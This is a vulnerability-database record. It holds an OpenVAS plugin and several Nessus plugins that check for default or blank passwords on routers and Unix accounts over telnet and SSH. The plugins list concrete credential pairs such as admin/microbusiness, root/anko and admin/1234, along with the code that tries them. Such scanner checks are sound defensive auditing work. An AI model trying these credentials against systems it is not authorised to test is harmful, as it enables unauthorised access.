{"lastseen": "2019-08-31T16:39:26", "references": [], "scheme": null, "pluginID": "136141256231012641", "description": "The remote host is a Pirelli AGE mB (microBusiness) router with its\n default password set (admin/microbusiness).", "edition": 8, "reporter": "Copyright (C) 1999 Anonymous", "published": "2005-11-03T00:00:00", "title": "Default password router Pirelli AGE mB", "type": "openvas", "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-1999-0502"]}, {"type": "nessus", "idList": ["ACCOUNT_ADMIN_7UJMKO0ADMIN.NASL", "ACCOUNT_ROOT_ROOTKIT1BIS.NASL", "ACCOUNT_ROOT_TESTPASS123.NASL", "ACCOUNT_NEXTHINK_123456.NASL", "ACCOUNT_NASADMIN_NASADMIN.NASL", "DDI_NETSCAPE_ENTERPRISE_DEFAULT_ADMINISTRATIVE_PASSWORD.NASL", "ACCOUNT_ROOT_54321.NASL", "ACCOUNT_DEBUG_SYNNET.NASL", "ACCOUNT_JILL.NASL", "ACCOUNT_ROOT_JVBZD.NASL"]}, {"type": "metasploit", "idList": ["MSF:AUXILIARY/SCANNER/TELNET/BROCADE_ENABLE_LOGIN", "MSF:AUXILIARY/SCANNER/POSTGRES/POSTGRES_LOGIN", "MSF:AUXILIARY/SCANNER/FTP/FTP_LOGIN", "MSF:AUXILIARY/SCANNER/VMWARE/VMWARE_HTTP_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/JOOMLA_BRUTEFORCE_LOGIN", "MSF:AUXILIARY/SCANNER/MYSQL/MYSQL_LOGIN", "MSF:AUXILIARY/SCANNER/TELNET/TELNET_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/DLINK_DIR_300_615_HTTP_LOGIN", "MSF:AUXILIARY/SCANNER/HTTP/HTTP_LOGIN"]}, {"type": "osvdb", "idList": ["OSVDB:876", "OSVDB:822"]}, {"type": "saint", "idList": ["SAINT:D03628286E2696A69838C01360532538", "SAINT:713447983665FEF2B21EA1044C36B51E"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:121655"]}], "modified": "2019-08-31T16:39:26", "rev": 2}, "score": {"value": 8.0, "vector": "NONE", "modified": "2019-08-31T16:39:26", "rev": 2}, "vulnersScore": 8.0}, "naslFamily": "Default Accounts", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2019-08-30T00:00:00", "id": "OPENVAS:136141256231012641", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231012641", "viewCount": 29, "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Default password router Pirelli AGE mB\n#\n# Authors:\n# Anonymous\n#\n# Copyright:\n# Copyright (C) 1999 Anonymous\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.12641\");\n script_version(\"2019-08-30T13:00:30+0000\");\n script_tag(name:\"last_modification\", value:\"2019-08-30 13:00:30 +0000 (Fri, 30 Aug 2019)\");\n script_tag(name:\"creation_date\", value:\"2005-11-03 14:08:04 +0100 (Thu, 03 Nov 2005)\");\n script_tag(name:\"cvss_base\", value:\"7.5\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_cve_id(\"CVE-1999-0502\");\n script_name(\"Default password router Pirelli AGE mB\");\n script_category(ACT_ATTACK);\n script_copyright(\"Copyright (C) 1999 Anonymous\");\n script_family(\"Default Accounts\");\n script_dependencies(\"telnetserver_detect_type_nd_version.nasl\", \"gb_default_credentials_options.nasl\");\n script_require_ports(\"Services/telnet\", 23);\n script_mandatory_keys(\"telnet/banner/available\");\n script_exclude_keys(\"default_credentials/disable_default_account_checks\");\n\n script_tag(name:\"solution\", value:\"Telnet to this router and set a password immediately.\");\n\n script_tag(name:\"summary\", value:\"The remote host is a Pirelli AGE mB (microBusiness) router with its\n default password set (admin/microbusiness).\");\n\n script_tag(name:\"impact\", value:\"An attacker could telnet to it and reconfigure it to lock the owner out\n and to prevent him from using his Internet connection, and do bad things.\");\n\n script_tag(name:\"solution_type\", value:\"Mitigation\");\n script_tag(name:\"qod_type\", value:\"remote_vul\");\n\n exit(0);\n}\n\ninclude(\"default_account.inc\");\ninclude(\"telnet_func.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"dump.inc\");\n\n# If optimize_test = no\nif( get_kb_item( \"default_credentials/disable_default_account_checks\" ) ) exit( 0 );\n\nport = telnet_get_port( default:23 );\n\nbanner = telnet_get_banner( port:port );\nif( ! banner || \"USER:\" >!< banner ) exit( 0 );\n\nsoc = open_sock_tcp( port );\nif( soc ) {\n\n r = recv_until( socket:soc, pattern:\"(USER:|ogin:)\" );\n if ( \"USER:\" >!< r ) {\n close( soc );\n exit( 0 );\n }\n\n s = string( \"admin\\r\\nmicrobusiness\\r\\n\" );\n send( socket:soc, data:s );\n r = recv_until( socket:soc, pattern:\"Configuration\" );\n close( soc );\n\n if( r && \"Configuration\" >< r ) {\n security_message( port:port );\n exit( 0 );\n }\n}\n\n#Second try as User (reopen soc because wrong pass disconnect)\nsoc = open_sock_tcp( port );\nif( soc ) {\n\n r = recv_until( socket:soc, pattern:\"(USER:|ogin:)\" );\n if ( \"USER:\" >!< r ) {\n close( soc );\n exit( 0 );\n }\n\n s = string( \"user\\r\\npassword\\r\\n\" );\n send( socket:soc, data:s );\n r = recv_until( socket:soc, pattern:\"Configuration\" );\n close( soc );\n\n if( r && \"Configuration\" >< r ) {\n security_message( port:port );\n }\n}\n\nexit( 0 );", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}

{"cve": [{"lastseen": "2020-09-21T13:50:05", "description": "A Unix account has a default, null, blank, or missing password.", "edition": 2, "cvss3": {}, "published": "1998-03-01T05:00:00", "title": "CVE-1999-0502", "type": "cve", "cwe": ["NVD-CWE-Other"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-1999-0502"], "modified": "2018-10-30T16:26:00", "cpe": ["cpe:/o:redhat:linux:6.0", "cpe:/o:sun:sunos:5.8", "cpe:/o:sun:solaris:2.6", "cpe:/o:hp:hp-ux:10.20", "cpe:/o:sun:sunos:5.5.1", "cpe:/o:sun:sunos:5.7", "cpe:/o:hp:hp-ux:11"], "id": "CVE-1999-0502", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-1999-0502", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:redhat:linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:10.20:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.5.1:*:*:*:*:*:*:*", "cpe:2.3:o:sun:solaris:2.6:*:*:*:*:*:*:*", "cpe:2.3:o:hp:hp-ux:11:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.8:*:*:*:*:*:*:*", "cpe:2.3:o:sun:sunos:5.7:*:*:*:*:*:*:*"]}], "nessus": [{"lastseen": "2020-09-14T13:10:07", "description": "The account 'root' on the remote host has the password 'f00b@r'.\n\nAn attacker may leverage this issue to gain administrative access to\nthe affected system.", "edition": 21, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2014-06-23T00:00:00", "title": "Default Password (f00b@r) for 'root' Account", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2020-09-02T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_F00BAR.NASL", "href": "https://www.tenable.com/plugins/nessus/76191", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\naccount = \"root\";\npassword = \"f00b@r\";\n\n\ninclude(\"compat.inc\");\n\n\nif (description)\n{\n script_id(76191);\n script_version(\"1.7\");\n script_cvs_date(\"Date: 2019/11/26\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password (f00b@r) for 'root' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default account.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the password 'f00b@r'.\n\nAn attacker may leverage this issue to gain administrative access to\nthe affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a strong password for this account or use ACLs to restrict access\nto the host.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:ND/RC:ND\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:X/RC:X\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/23\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_detect.nasl\", \"account_check.nasl\", \"telnetserver_detect_type_nd_version.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T13:10:07", "description": "The account 'root' on the remote host has the default password 'anko'.\nA remote attacker can exploit this issue to gain administrative access\nto the affected system.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "title": "Default Password 'anko' for 'root' Account", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2020-09-02T00:00:00", "cpe": [], "id": "ACCOUNT_ROOT_ANKO.NASL", "href": "https://www.tenable.com/plugins/nessus/94387", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"root\";\npassword = \"anko\";\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94387);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password 'anko' for 'root' Account\");\n script_summary(english:\"Attempts to log into the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"An administrative account on the remote host uses a known default\npassword.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'root' on the remote host has the default password 'anko'.\nA remote attacker can exploit this issue to gain administrative access\nto the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2016-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T13:10:05", "description": "The account '4Dgifts' has no password set. An attacker may use it to gain \nfurther privileges on this system.", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "title": "Unpassworded '4Dgifts' Account", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2020-09-02T00:00:00", "cpe": [], "id": "ACCOUNT_4DGIFTS.NASL", "href": "https://www.tenable.com/plugins/nessus/11243", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\naccount = \"4Dgifts\";\n\nif (description)\n{\n script_id(11243);\n script_version (\"1.36\");\n script_cvs_date(\"Date: 2018/07/25 16:19:22\");\n\n script_cve_id(\"CVE-1999-0502\");\n \n script_name(english:\"Unpassworded '4Dgifts' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n \"The remote host has an account with a blank password.\"\n );\n\n script_set_attribute(attribute:\"description\", value:\n\"The account '4Dgifts' has no password set. An attacker may use it to gain \nfurther privileges on this system.\"\n );\n\n script_set_attribute(attribute:\"solution\", value:\n \"Set a password for this account or disable it.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n \n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n \n script_copyright(english:\"This script is Copyright (C) 2003-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\"); \n \n script_dependencie(\"find_service1.nasl\", \"os_fingerprint.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif ( ! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n{\n os = get_kb_item(\"Host/OS\");\n if ( os && \"IRIX\" >!< os )\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set, and the remote OS is not IRIX.\");\n}\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T13:10:05", "description": "The account 'admin' on the remote host has the password 'admin'. An\nattacker may leverage this issue to gain access to the affected system\nand launch further attacks against it.", "edition": 28, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2008-09-04T00:00:00", "title": "Default Password (admin) for 'admin' Account", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2020-09-02T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_ADMIN.NASL", "href": "https://www.tenable.com/plugins/nessus/34081", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"admin\";\n\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(34081);\n script_version (\"1.22\");\n script_cvs_date(\"Date: 2018/07/25 16:19:22\");\n\n script_cve_id(\"CVE-1999-0502\");\n \n script_name(english:\"Default Password (admin) for 'admin' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n \n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the password 'admin'. An\nattacker may leverage this issue to gain access to the affected system\nand launch further attacks against it.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2008/09/04\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2003/02/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n\n script_copyright(english:\"This script is Copyright (C) 2008-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n \n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, password:password, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2020-09-14T13:10:07", "description": "The account 'tutor' has no password set. An attacker may use this\nto gain further privileges on this system.", "edition": 29, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2003-02-20T00:00:00", "title": "Unpassworded 'tutor' Account", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2020-09-02T00:00:00", "cpe": [], "id": "ACCOUNT_TUTOR.NASL", "href": "https://www.tenable.com/plugins/nessus/11251", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"tutor\";\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(11251);\n script_version (\"1.33\");\n script_cvs_date(\"Date: 2018/07/25 16:19:22\");\n\n script_cve_id(\"CVE-1999-0502\");\n \n script_name(english:\"Unpassworded 'tutor' Account\");\n script_summary(english:\"Attempts to log in to the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote host has an account with no password set.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'tutor' has no password set. An attacker may use this\nto gain further privileges on this system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Set a password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:TF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:T/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2001/01/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2003/02/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\t\t \n script_category(ACT_GATHER_INFO);\n script_family(english:\"Default Unix Accounts\");\n \n script_copyright(english:\"This script is Copyright (C) 2003-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n \n script_dependencies(\"find_service1.nasl\", \"ssh_detect.nasl\", \"account_check.nasl\");\n script_require_ports(\"Services/telnet\", 23, \"Services/ssh\", 22);\n script_exclude_keys(\"global_settings/supplied_logins_only\");\n\n exit(0);\n}\n\n#\n# The script code starts here : \n#\ninclude(\"audit.inc\");\ninclude(\"default_account.inc\");\ninclude(\"global_settings.inc\");\n\nif (supplied_logins_only) audit(AUDIT_SUPPLIED_LOGINS_ONLY);\n\nif (! thorough_tests && ! get_kb_item(\"Settings/test_all_accounts\"))\n exit(0, \"Neither thorough_tests nor 'Settings/test_all_accounts' is set.\");\n\naffected = FALSE;\nssh_ports = get_service_port_list(svc: \"ssh\", default:22);\nforeach port (ssh_ports)\n{\n port = check_account(login:account, port:port, svc:\"ssh\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(affected) exit(0);\n\ntelnet_ports = get_service_port_list(svc: \"telnet\", default:23);\nforeach port (telnet_ports)\n{\n port = check_account(login:account, port:port, svc:\"telnet\");\n if (port)\n {\n affected = TRUE;\n security_report_v4(port:port, severity:SECURITY_HOLE, extra:default_account_report());\n }\n}\nif(!affected) audit(AUDIT_HOST_NOT, \"affected\");\n\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-09-14T13:10:05", "description": "The account 'admin' on the remote host has the default password\n'1234'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.", "edition": 22, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2016-10-28T00:00:00", "title": "Default Password '1234' for 'admin' Account", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-1999-0502"], "modified": "2020-09-02T00:00:00", "cpe": [], "id": "ACCOUNT_ADMIN_1234.NASL", "href": "https://www.tenable.com/plugins/nessus/94362", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\naccount = \"admin\";\npassword = \"1234\";\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(94362);\n script_version(\"1.6\");\n script_cvs_date(\"Date: 2019/11/14\");\n\n script_cve_id(\"CVE-1999-0502\");\n\n script_name(english:\"Default Password '1234' for 'admin' Account\");\n script_summary(english:\"Attempts to log into the remote host.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote system can be accessed with a default administrator\naccount.\");\n script_set_attribute(attribute:\"description\", value:\n\"The account 'admin' on the remote host has the default password\n'1234'. A remote attacker can exploit this issue to gain\nadministrative access to the affected system.\");\n script_set_attribute(attribute:\"solution\", value:\n\"Change the password for this account or disable it.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-1999-0502\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SSH User Code Execution');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/10/28\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"default_account\", value:\"true\");\n script_end_attributes();\n\n 